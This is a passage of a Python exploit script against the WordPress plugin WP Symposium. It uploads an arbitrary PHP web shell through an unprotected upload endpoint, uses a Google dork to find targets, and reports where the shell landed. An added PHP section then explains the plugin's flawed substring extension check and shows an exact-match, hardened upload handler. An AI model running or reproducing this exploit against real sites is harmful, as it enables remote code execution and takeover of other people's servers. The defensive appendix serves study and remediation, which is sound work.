#           echo __('Sorry, file type not allowed.', WPS_TEXT_DOMAIN);
#       } else {
#           // Copy file to tmp location
#   ...
#   ...
#   ...
#
# BUT "/wp-symposium/server/php/index.php" is not protected, and "/wp-symposium/server/php/UploadHandler.php" allows any extension
#
# The same vulnerable files are located in "/wp-symposium/mobile-files/server/php/"
#
# ---------------------------------------------------------------------
#
# Dork google:  index of "wp-symposium"
#
#
# Tested on BackBox 3.x with python 2.6
#
# Http connection
import urllib, urllib2, socket
#
import sys
# String manipulator
import string, random
# Args management
import optparse
# File management
import os, os.path, mimetypes
 
# Check url
def checkurl(url):
    if url[:8] != "https://" and url[:7] != "http://":
        print('[X] You must insert http:// or https:// protocol')
        sys.exit(1)
    else:
        return url

# Check if file exists and is readable
def checkfile(file):
    # either a missing file or an unreadable one is enough to abort
    if not os.path.isfile(file) or not os.access(file, os.R_OK):
        print('[X] '+file+' file is missing or not readable')
        sys.exit(1)
    else:
        return file
# Get file's mimetype
def get_content_type(filename):
    return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
 
def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
    return ''.join(random.choice(chars) for _ in range(size))
 
# Create multipart header
def create_body_sh3ll_upl04d(payloadname, randDirName, randShellName):
 
   getfields = dict()
   getfields['uploader_uid'] = '1'
   getfields['uploader_dir'] = './'+randDirName
   getfields['uploader_url'] = url_symposium_upload
 
   payloadcontent = open(payloadname).read()
 
   LIMIT = '----------lImIt_of_THE_fIle_eW_$'
   CRLF = '\r\n'
 
   L = []
   for (key, value) in getfields.items():
      L.append('--' + LIMIT)
      L.append('Content-Disposition: form-data; name="%s"' % key)
      L.append('')
      L.append(value)
 
   L.append('--' + LIMIT)
   L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('files[]', randShellName+".php"))
   L.append('Content-Type: %s' % get_content_type(payloadname))
   L.append('')
   L.append(payloadcontent)
   L.append('--' + LIMIT + '--')
   L.append('')
   body = CRLF.join(L)
   return body
 
banner = """
  ___ ___               __
 |   Y   .-----.----.--|  .-----.----.-----.-----.-----.
 |.  |   |  _  |   _|  _  |  _  |   _|  -__|__ --|__ --|
 |. / \  |_____|__| |_____|   __|__| |_____|_____|_____|
 |:      |                |__|
 |::.|:. |
 `--- ---'
  ___ ___ _______        _______                                  __
 |   Y   |   _   |______|   _   .--.--.--------.-----.-----.-----|__.--.--.--------.
 |.  |   |.  1   |______|   1___|  |  |        |  _  |  _  |__ --|  |  |  |        |
 |. / \  |.  ____|      |____   |___  |__|__|__|   __|_____|_____|__|_____|__|__|__|
 |:      |:  |          |:  1   |_____|        |__|
 |::.|:. |::.|          |::.. . |
 `--- ---`---'          `-------'
                                                              Wp-Symposium
                                                      Sh311 Upl04d Vuln3r4b1l1ty
                                                                v14.11
 
                                 Written by:
 
                               Claudio Viviani
 
                            http://www.homelab.it
 
                               info@homelab.it
                           homelabit@protonmail.ch
 
                      https://www.facebook.com/homelabit
                        https://twitter.com/homelabit
                      https://plus.google.com/+HomelabIt1/
             https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""
 
commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME.PHP [--timeout sec]')
commandList.add_option('-t', '--target', action="store",
                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                  )
commandList.add_option('-f', '--file', action="store",
                  help="Insert file name, ex: shell.php",
                  )
commandList.add_option('--timeout', action="store", default=10, type="int",
                  help="[Timeout Value] - Default 10",
                  )
 
options, remainder = commandList.parse_args()
 
# Check args
if not options.target or not options.file:
    print(banner)
    commandList.print_help()
    sys.exit(1)
 
payloadname = checkfile(options.file)
host = checkurl(options.target)
timeout = options.timeout
 
print(banner)
 
socket.setdefaulttimeout(timeout)
 
url_symposium_upload = host+'/wp-content/plugins/wp-symposium/server/php/'
 
content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'
 
randDirName = id_generator()
randShellName = id_generator()
 
bodyupload = create_body_sh3ll_upl04d(payloadname, randDirName, randShellName)
 
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
           'content-type': content_type,
           'content-length': str(len(bodyupload)) }
 
try:
    req = urllib2.Request(url_symposium_upload+'index.php', bodyupload, headers)
    response = urllib2.urlopen(req)
    read = response.read()
 
    if "error" in read or read == "0" or read == "":
       print("[X] Upload Failed :(")
    else:
       print("[!] Shell Uploaded")
       print("[!] Location: "+url_symposium_upload+randDirName+randShellName+".php\n")
 
except urllib2.HTTPError as e:
    print("[X] "+str(e))
except urllib2.URLError as e:
    print("[X] Connection Error: "+str(e))
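The extension test quoted in the script's header, placed beside an exact-match version, as an added example in PHP; this is not WP Symposium's code. The three extension lists stand in for the get_option() values, the function names are assumed, and the example goes one step further than the header by showing that the strpos() substring test also accepts strings that are not whole entries of the list.

```php
<?php
// Added example, not WP Symposium's code. The three extension lists are
// constructed stand-ins for the get_option() values the quoted check reads.
$image_ext = 'jpg,jpeg,png,gif';
$doc_ext   = 'pdf,doc,docx';
$video_ext = 'mp4,webm';

// The test quoted in the header above: a substring search over the joined
// lists. strpos() returns a match offset, so any string that occurs anywhere
// inside the joined list is accepted, not only whole entries.
function ext_allowed_substring( $filename, $image_ext, $doc_ext, $video_ext ) {
    $allowedExts = ',' . $image_ext . ',' . $doc_ext . ',' . $video_ext;
    $ext = pathinfo( $filename, PATHINFO_EXTENSION );
    return (bool) strpos( $allowedExts, $ext );
}

// Hardened form: split the lists into entries, normalise case and require an
// exact match; an empty extension is never allowed.
function build_allow_list( $image_ext, $doc_ext, $video_ext ) {
    $entries = explode( ',', $image_ext . ',' . $doc_ext . ',' . $video_ext );
    $entries = array_map( 'strtolower', array_map( 'trim', $entries ) );
    return array_values( array_filter( $entries, 'strlen' ) );
}

function ext_allowed_exact( $filename, array $allowed ) {
    $ext = strtolower( pathinfo( $filename, PATHINFO_EXTENSION ) );
    return $ext !== '' && in_array( $ext, $allowed, true );
}

// The check only helps if every endpoint that writes files calls it; the
// advisory's point is that server/php/index.php did not. The stored name is
// generated server-side so the client never chooses it.
function handle_upload( array $file, array $allowed, $dest_dir ) {
    if ( $file['error'] !== UPLOAD_ERR_OK || ! ext_allowed_exact( $file['name'], $allowed ) ) {
        return false;
    }
    $ext  = strtolower( pathinfo( $file['name'], PATHINFO_EXTENSION ) );
    $dest = rtrim( $dest_dir, '/' ) . '/' . bin2hex( random_bytes( 8 ) ) . '.' . $ext;
    return move_uploaded_file( $file['tmp_name'], $dest ) ? $dest : false;
}

$allowed = build_allow_list( $image_ext, $doc_ext, $video_ext );
foreach ( array( 'report.pdf', 'photo.JPG', 'note.jp', 'x.g,jpe' ) as $name ) {
    printf( "%-10s substring=%-5s exact=%s\n", $name,
        var_export( ext_allowed_substring( $name, $image_ext, $doc_ext, $video_ext ), true ),
        var_export( ext_allowed_exact( $name, $allowed ), true ) );
}
```

The loop shows that note.jp and x.g,jpe pass the substring test only because "jp" and "g,jpe" occur inside ",jpg,jpeg,", while photo.JPG fails it on case alone; the exact-match version gets all three right.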
